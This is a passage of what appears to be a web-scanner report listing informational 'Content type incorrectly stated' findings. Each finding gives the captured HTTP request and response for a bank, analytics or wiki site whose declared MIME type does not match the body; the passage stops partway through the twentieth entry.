Set-Cookie: PHPSESSID=5jdee9v5utii7ouils1v34hfm1; path=/; domain=.thailandhotelforums.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 13:34:08 GMT
Connection: close
Content-Type: text/html; charset=TIS-620
Content-Length: 47754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-Type" content="text/html; charset=TIS-620" />
   <meta name="description" content="ThailandHotel Forum Thailand Travel Tourism Tourist Board - Index" />
...[SNIP]...

33. Content type incorrectly stated  previous  next
There are 66 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


33.1. https://feedback.live.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://feedback.live.com
Path:   /default.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsathome&P2=&P3=cfcache&P4=NOFORM&P5=B506C07761D7465D924574124E3C14DF&P6=Washington, District Of Columbia&P9=38.906898498%2f-77.028396606&P10=0&P11=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2f%3fFORM%3dFEEDTU HTTP/1.1
Host: feedback.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Tue, 03 May 2011 13:22:26 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

33.2. http://group.barclays.com/assets/img/icons/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /assets/img/icons/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /assets/img/icons/favicon.ico HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454061117:ss=1304454046661

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:04 GMT
Server: Apache
Last-Modified: Thu, 08 Jan 2009 18:45:32 GMT
ETag: "47e-45ffd0b8d0b00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...........................................*....c..............%c..b...................................H1.............}...w...y....<...P%..........................
...[SNIP]...

33.3. http://group.barclays.com/cs/Satellite  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /cs/Satellite

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /cs/Satellite?blobcol=urldata&blobkey=id&blobtable=MungoBlobs&blobwhere=1231874111043&ssbinary=true HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=279736CC063C1B2534CB7417BD0DAEC7.tomcat_1_1

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:48 GMT
Set-Cookie: JSESSIONID=68260B4B0A24869558A521A45621A758.tomcat_2_1; Path=/cs
Last-Modified: Tue, 03 May 2011 08:08:05 GMT
Content-Type: image/gif
Content-Length: 49929

.PNG
.
...IHDR.......l.....L..'....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....IDATx^|..T.....eKw...
w..pwwwww.!....'..$...%...C.....}.y....|.>...1......BBH.r.{...\?.c.
...[SNIP]...

33.4. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-light-webfont.eot  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /html_phase_2/assets/css/fonts/expertsans-light-webfont.eot

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /html_phase_2/assets/css/fonts/expertsans-light-webfont.eot HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: group.barclays.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:19:50 GMT
Server: Apache
Last-Modified: Mon, 04 Apr 2011 08:18:48 GMT
ETag: "8960-4a01368af8a00"
Accept-Ranges: bytes
Content-Length: 35168
Content-Type: text/plain; charset=UTF-8

`.................................LP................... ....rT....................".E.x.p.e.r.t. .S.a.n.s. .L.i.g.h.t.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...0...2.E.x.p.e.r.t. .S.a.n.s. .L.i.g.h.t.
...[SNIP]...

33.5. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-light-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /html_phase_2/assets/css/fonts/expertsans-light-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /html_phase_2/assets/css/fonts/expertsans-light-webfont.woff HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:47 GMT
Server: Apache
Last-Modified: Mon, 04 Apr 2011 08:18:48 GMT
ETag: "53b8-4a01368af8a00"
Accept-Ranges: bytes
Content-Length: 21432
Content-Type: text/plain; charset=UTF-8

wOFF......S.................................FFTM...l........Z./yGDEF........... ....OS/2.......M...Vu...cmap............
~..cvt .......@...@....fpgm...........e../.gasp................glyf......E...v.
...[SNIP]...

33.6. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-regular-webfont.eot  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /html_phase_2/assets/css/fonts/expertsans-regular-webfont.eot

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /html_phase_2/assets/css/fonts/expertsans-regular-webfont.eot HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: group.barclays.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:19:50 GMT
Server: Apache
Last-Modified: Mon, 04 Apr 2011 08:18:48 GMT
ETag: "88dc-4a01368af8a00"
Accept-Ranges: bytes
Content-Length: 35036
Content-Type: text/plain; charset=UTF-8

..................................LP................... ..........................&.E.x.p.e.r.t. .S.a.n.s. .R.e.g.u.l.a.r.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...0...6.E.x.p.e.r.t. .S.a.n.s. .R.e.g.
...[SNIP]...

33.7. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-regular-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /html_phase_2/assets/css/fonts/expertsans-regular-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /html_phase_2/assets/css/fonts/expertsans-regular-webfont.woff HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:47 GMT
Server: Apache
Last-Modified: Mon, 04 Apr 2011 08:18:49 GMT
ETag: "53b4-4a01368becc40"
Accept-Ranges: bytes
Content-Length: 21428
Content-Type: text/plain; charset=UTF-8

wOFF......S.................................FFTM...l........Z./.GDEF........... ....OS/2.......M...Vu...cmap..............,?cvt .......D...D.N.>fpgm...........e../.gasp................glyf......E...u.
...[SNIP]...

33.8. http://lvs.truehits.in.th/goggen.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://lvs.truehits.in.th
Path:   /goggen.php

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /goggen.php?hc=c0002215&bv=0&rf=bookmark&test=TEST&web=86%2bw3I1VFK0u1DIAue87Ug%3D%3D&bn=Netscape&ss=1920*1200&sc=16&sv=1.3&ck=y&ja=y&vt=8A158878.1&fp=d&fv=10.2%20r154&truehitspage=BOT%20Homepage%20(Thai%20Version)&truehitsurl=http%3a//www.bot.or.th/english/Pages/BOTDefault.aspx HTTP/1.1
Host: lvs.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ck3rdparty=1

Response

HTTP/1.1 200 OK
Set-Cookie: truehitsid=WtLJ2Jfs; expires=Thu, 31 Dec 2037 17:00:00 GMT; path=/
Content-type: image/jpeg
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Connection: close
Date: Tue, 03 May 2011 11:44:17 GMT
Server: lighttpd
Content-Length: 91

GIF89a............333....!.......,..........,....=..l.....jzc].Vq.g..0....#.....w9........;

33.9. http://meta.wikimedia.org/w/index.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://meta.wikimedia.org
Path:   /w/index.php

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /w/index.php?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400 HTTP/1.1
Host: meta.wikimedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:44:16 GMT
Server: Apache
Cache-Control: public, s-maxage=21600, max-age=86400
Last-Modified: Wed, 27 Apr 2011 17:46:22 GMT
Vary: Accept-Encoding
Content-Type: text/javascript; charset=UTF-8
X-Cache: MISS from sq66.wikimedia.org
X-Cache-Lookup: HIT from sq66.wikimedia.org:3128
X-Cache: HIT from sq61.wikimedia.org
X-Cache-Lookup: HIT from sq61.wikimedia.org:80
Connection: keep-alive
Content-Length: 13163

// [[image:Erioll_world.svg|18px]] '''WikiMiniAtlas''' <br>
// Script to embed interactive maps into pages that have coordinate templates <br>
// also check my user page [[User:Dschwen]] for more tool
...[SNIP]...

33.10. http://moneytalk.scb.co.th/css/style.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /css/style.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /css/style.txt HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 7097
Content-Type: text/plain
Content-Location: http://moneytalk.scb.co.th/css/style.txt
Last-Modified: Wed, 27 Jan 2010 03:35:02 GMT
Accept-Ranges: bytes
ETag: "0775cb519fca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:03:50 GMT


.TextMainBlack {
   font-family: Tahoma, sans-serif;
   font-size: 12px;
   font-style: normal;
   line-height: normal;
   font-weight: normal;
   font-variant: normal;
   text-transform: none;
   color: 00
...[SNIP]...

33.11. http://moneytalk.scb.co.th/css/style_th.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /css/style_th.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /css/style_th.txt HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: moneytalk.scb.co.th

Response

HTTP/1.1 200 OK
Content-Length: 7342
Content-Type: text/plain
Content-Location: http://moneytalk.scb.co.th/css/style_th.txt
Last-Modified: Wed, 27 Jan 2010 03:33:36 GMT
Accept-Ranges: bytes
ETag: "0e8198219fca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:24:25 GMT


.TextMainBlack {
   font-family: Tahoma, Microsoft Sans Serif;
   font-size: 12px;
   font-style: normal;
   line-height: normal;
   font-weight: normal;
   font-variant: normal;
   text-transform: none;

...[SNIP]...

33.12. http://moneytalk.scb.co.th/en/include/bank-online.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /en/include/bank-online.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /en/include/bank-online.html HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://moneytalk.scb.co.th/
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 393
Content-Type: text/html
Content-Location: http://moneytalk.scb.co.th/en/include/bank-online.html
Last-Modified: Wed, 09 Dec 2009 14:15:06 GMT
Accept-Ranges: bytes
ETag: "011b01da78ca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:07:16 GMT

...<ul>
   <li><a href="http://www.scbeasy.com" target="_blank">EASY NET</a></li>
<li><a href="http://www.scbbusinessnet.com" target="_blank">BUSINESS NET</a></li>
<li><a href="http://www.scb-f
...[SNIP]...

33.13. http://moneytalk.scb.co.th/en/include/scb-quick-link.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /en/include/scb-quick-link.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /en/include/scb-quick-link.html HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://moneytalk.scb.co.th/
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 1376
Content-Type: text/html
Content-Location: http://moneytalk.scb.co.th/en/include/scb-quick-link.html
Last-Modified: Tue, 26 Jan 2010 02:39:08 GMT
Accept-Ranges: bytes
ETag: "0eecebb309eca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:07:16 GMT

...<ul>
   <li><a href="http://www.scb.co.th/th/oth/rate.shtml" target="_blank">Interest Rates and Fees</a></li>
<li><a href="http://www.scb.co.th/scb_api/index.jsp" target="_blank">Exchanges Rate
...[SNIP]...

33.14. http://moneytalk.scb.co.th/th/include/bank-online.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /th/include/bank-online.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /th/include/bank-online.html HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 393
Content-Type: text/html
Content-Location: http://moneytalk.scb.co.th/th/include/bank-online.html
Last-Modified: Wed, 09 Dec 2009 14:14:22 GMT
Accept-Ranges: bytes
ETag: "03376e7d978ca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:04:00 GMT

...<ul>
   <li><a href="http://www.scbeasy.com" target="_blank">EASY NET</a></li>
<li><a href="http://www.scbbusinessnet.com" target="_blank">BUSINESS NET</a></li>
<li><a href="http://www.scb-f
...[SNIP]...

33.15. http://moneytalk.scb.co.th/th/include/footer.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /th/include/footer.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /th/include/footer.html HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 1574
Content-Type: text/html
Content-Location: http://moneytalk.scb.co.th/th/include/footer.html
Last-Modified: Wed, 27 Jan 2010 09:43:26 GMT
Accept-Ranges: bytes
ETag: "0335f2c359fca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:04:02 GMT

<link href="../../css/style.txt" rel="stylesheet" type="text/css">
<table width="1060" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="right"><table width="100%" border="0" cellsp
...[SNIP]...

33.16. http://moneytalk.scb.co.th/th/include/scb-quick-link.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /th/include/scb-quick-link.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /th/include/scb-quick-link.html HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 1705
Content-Type: text/html
Content-Location: http://moneytalk.scb.co.th/th/include/scb-quick-link.html
Last-Modified: Tue, 26 Jan 2010 02:38:52 GMT
Accept-Ranges: bytes
ETag: "08645b2309eca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:04:02 GMT

...<ul>
   <li><a href="http://www.scb.co.th/th/oth/rate.shtml" target="_blank">....................................................................................</a></li>
<li><a href="http://ww
...[SNIP]...

33.17. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&elqGUID=&siteid=738&ref=http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534&ref2=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg%26domain=formlessnetworking.com&tzo=360&ms=667 HTTP/1.1
Host: now.eloqua.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534
Cookie: ELOQUA=GUID=1DA3340F1C23453982F3CB2F3806B4F8; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:32:01 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

33.18. http://rtradeinfo.bualuang.co.th/tradinginfo.services/css/bbl_style.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rtradeinfo.bualuang.co.th
Path:   /tradinginfo.services/css/bbl_style.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /tradinginfo.services/css/bbl_style.css HTTP/1.1
Host: rtradeinfo.bualuang.co.th
Proxy-Connection: keep-alive
Referer: http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php?lang=E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:44:53 GMT
Server: Apache
Last-Modified: Mon, 30 May 2005 04:30:14 GMT
ETag: "13923-702-429a96d6"
Accept-Ranges: bytes
Content-Length: 1794
Content-Type: text/css

<style type="text/css">

.border1 {
   border: thin none;
}
.border2 {
   border: thin none;
   border-color:#003366;
}
.Link1 {
   font-size: xxx-small;
   font-weight: bold;
   color:#000099;
   text-decoration:
...[SNIP]...

33.19. http://sedoparking.com/r/ads/adcode.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sedoparking.com
Path:   /r/ads/adcode.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /r/ads/adcode.js HTTP/1.1
Host: sedoparking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:31:32 GMT
Server: Apache
Last-Modified: Tue, 20 Jul 2010 11:42:53 GMT
ETag: "a-48bd02f7ca940"
Accept-Ranges: bytes
Content-Length: 10
Vary: User-Agent
Content-Type: application/javascript
X-Cache: MISS from 835865
Connection: close

aas=false;

33.20. http://tc.barclays.co.uk/c  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://tc.barclays.co.uk
Path:   /c

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

